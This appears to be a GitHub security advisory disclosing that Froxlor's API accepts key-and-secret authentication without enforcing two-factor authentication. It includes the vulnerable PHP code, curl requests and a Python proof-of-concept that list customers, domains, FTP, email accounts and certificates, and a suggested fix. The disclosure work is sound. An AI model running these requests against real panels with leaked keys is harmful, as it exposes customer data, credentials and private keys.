"details": "## Summary\n\nFroxlor's API authentication (`FroxlorRPC::validateAuth`) does not enforce Two-Factor Authentication. When a user (admin or customer) enables 2FA on their account, the web UI correctly requires a TOTP code after password verification. However, the API accepts requests authenticated with only an API key and secret — no TOTP challenge is issued, checked, or required.\n\nAn attacker who obtains a leaked API key+secret for a 2FA-protected account has full access to all API operations without providing a second factor.\n\n## Affected Code\n\n**Web UI — 2FA enforced** (`index.php:82-149`):\n\n```php\nif ($result['type_2fa'] != 0) {\n // Redirects to 2FA input page\n // Calls FroxlorTwoFactorAuth::verifyCode()\n // Login is NOT completed without valid TOTP code\n}\n```\n\n**API — 2FA absent** (`lib/Froxlor/Api/FroxlorRPC.php:75-105`):\n\n```php\nprivate static function validateAuth(string $key, string $secret): bool\n{\n $sel_stmt = Database::prepare(\"\n SELECT ak.*, a.api_allowed as admin_api_allowed,\n c.api_allowed as cust_api_allowed, c.deactivated\n FROM `api_keys` ak\n LEFT JOIN `panel_admins` a ON a.adminid = ak.adminid\n LEFT JOIN `panel_customers` c ON c.customerid = ak.customerid\n WHERE `apikey` = :ak AND `secret` = :as\n \");\n $result = Database::pexecute_first($sel_stmt, ['ak' => $key, 'as' => $secret]);\n if ($result) {\n if ($result['apikey'] == $key && $result['secret'] == $secret\n && ($result['valid_until'] == -1 || $result['valid_until'] >= time())\n && (($result['customerid'] == 0 && $result['admin_api_allowed'] == 1)\n || ($result['customerid'] > 0 && $result['cust_api_allowed'] == 1\n && $result['deactivated'] == 0))) {\n // Checks: key match, secret match, not expired, API allowed, not deactivated\n // Missing: ANY check for type_2fa, TOTP verification, or 2FA status\n return true;\n }\n }\n throw new Exception('Invalid authorization credentials', 403);\n}\n```\n\nThere are zero references to 2FA, TOTP, `type_2fa`, or `FroxlorTwoFactorAuth` in the entire `lib/Froxlor/Api/` directory:\n\n```bash\n$ grep -rn '2fa\\|totp\\|two.factor\\|FroxlorTwoFactor' lib/Froxlor/Api/\n# (no output)\n```\n\n## PoC\n\n### Environment\n\n- Froxlor 2.3.5, clean Docker install (Debian Bookworm, PHP 8.2, Apache 2.4)\n- API enabled (`api.enabled=1`)\n- Admin account has 2FA enabled (`type_2fa=1`, TOTP configured)\n- Admin has an API key\n\n### Step 1: Confirm 2FA blocks web UI login\n\n```\nPOST /index.php HTTP/1.1\nHost: panel.example.com\nContent-Type: application/x-www-form-urlencoded\n\nloginname=admin&password=Admin123!@#&csrf_token=TOKEN&send=send\n```\n\n**Result:** Redirect to `index.php?showmessage=4` — 2FA page. Login is NOT completed. The user cannot access the dashboard without entering a TOTP code.\n\n### Step 2: Authenticate via API — no TOTP required\n\n```bash\ncurl -s -u \"API_KEY:API_SECRET\" \\\n -H 'Content-Type: application/json' \\\n -d '{\"command\":\"Customers.listing\",\"params\":{}}' \\\n https://panel.example.com/api.php\n```\n\n**Result:** HTTP 200 with full customer listing:\n\n```json\n{\n \"data\": {\n \"list\": [\n {\n \"loginname\": \"testcust\",\n \"email\": \"test@froxlor.lab\",\n \"name\": \"Test\",\n \"firstname\": \"Customer\"\n }\n ]\n }\n}\n```\n\nNo TOTP code was provided. No 2FA prompt was returned. Full access granted.\n\n### Step 3: Access additional sensitive resources\n\nAll of these succeed without any 2FA challenge:\n\n```bash\n# Domains\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"Domains.listing\"}' .../api.php\n# FTP accounts (home directories, credentials)\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"Ftps.listing\"}' .../api.php\n# Email accounts\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"Emails.listing\"}' .../api.php\n# MySQL databases\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"Mysqls.listing\"}' .../api.php\n# SSL certificates (private keys)\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"Certificates.listing\"}' .../api.php\n# DNS records\ncurl -s -u \"KEY:SECRET\" -d '{\"command\":\"DomainZones.listing\",\"params\":{\"domainname\":\"example.com\"}}' .../api.php\n```\n\n165 API functions are accessible, including write operations (`Customers.update`, `Domains.add`, `Ftps.add`, etc.).\n\n### Automated PoC Script\n\n```python\n#!/usr/bin/env python3\n\"\"\"Froxlor <= 2.3.x — 2FA Bypass via API (CWE-287)\"\"\"\nimport json, sys, requests, urllib3\nurllib3.disable_warnings()\n\ntarget, key, secret = sys.argv[1], sys.argv[2], sys.argv[3]\n\nr = requests.post(f\"{target}/api.php\", auth=(key, secret),\n json={\"command\": \"Customers.listing\", \"params\": {}}, verify=False)\ndata = r.json()\n\nprint(f\"HTTP {r.status_code}\")\nif \"data\" in data:\n for c in data[\"data\"].get(\"list\", []):\n print(f\" {c['loginname']} | {c['email']}\")\n print(f\"\\n2FA-protected account accessed without TOTP. {len(data['data'].get('list',[]))} customers exposed.\")\n```\n\nUsage: `python3 poc.py https://panel.example.com API_KEY API_SECRET`\n\n## Impact\n\nWhen a user enables 2FA, they expect all access to their account requires a second factor. The API completely bypasses this expectation:\n\n- **Customer data**: PII (name, email, address) readable and modifiable\n- **Domains**: Full control over domains, subdomains, DNS records\n- **Email accounts**: Create, read, delete email accounts and forwarders\n- **FTP accounts**: Access home directory paths and credentials\n- **MySQL databases**: Full database management\n- **SSL certificates**: Read private keys, modify certificate bindings\n- **165 API functions**: Including all write operations\n\nAPI keys can be leaked through database backups, log files, config file exposure (GHSA-34qg-65m4-f23m demonstrated DB credential leaks), or compromised automation scripts. Users who enabled 2FA specifically to protect against credential compromise are not protected.\n\n### Comparison with CVE-2023-3173\n\nCVE-2023-3173 (\"2FA Bypass by Brute Force\") was accepted as **Critical ($60 bounty)** and fixed by adding rate limiting to 2FA verification. This finding is architecturally different — the API authentication path has no 2FA logic at all. No brute force is needed; the second factor is simply never requested.\n\n## Suggested Fix\n\nAdd 2FA verification to `FroxlorRPC::validateAuth()`. When the authenticated user has `type_2fa != 0`, require a TOTP code as an additional API parameter:\n\n```php\n// lib/Froxlor/Api/FroxlorRPC.php, after line 100:\n// Check 2FA if enabled for this user\nif (!empty($result['adminid'])) {\n $user = Database::pexecute_first(\n Database::prepare(\"SELECT type_2fa, data_2fa FROM panel_admins WHERE adminid = :id\"),\n ['id' => $result['adminid']]\n );\n} else {\n $user = Database::pexecute_first(\n Database::prepare(\"SELECT type_2fa, data_2fa FROM panel_customers WHERE customerid = :id\"),\n ['id' => $result['customerid']]\n );\n}\nif ($user && $user['type_2fa'] != 0) {\n // Require X-2FA-Code header or 'totp_code' in request body\n $totp_code = $_SERVER['HTTP_X_2FA_CODE'] ?? null;\n if (empty($totp_code)) {\n throw new Exception('2FA code required', 401);\n }\n $tfa = new FroxlorTwoFactorAuth($user['data_2fa']);\n if (!$tfa->verifyCode($totp_code)) {\n throw new Exception('Invalid 2FA code', 403);\n }\n}\n```\n\nAlternatively, disable API key creation for accounts with 2FA enabled, or require 2FA re-verification when generating new API keys.",
![advisory-database[bot]](https://avatars.githubusercontent.com/in/21409?v=4&size=40){kind=avatar}
0 commit comments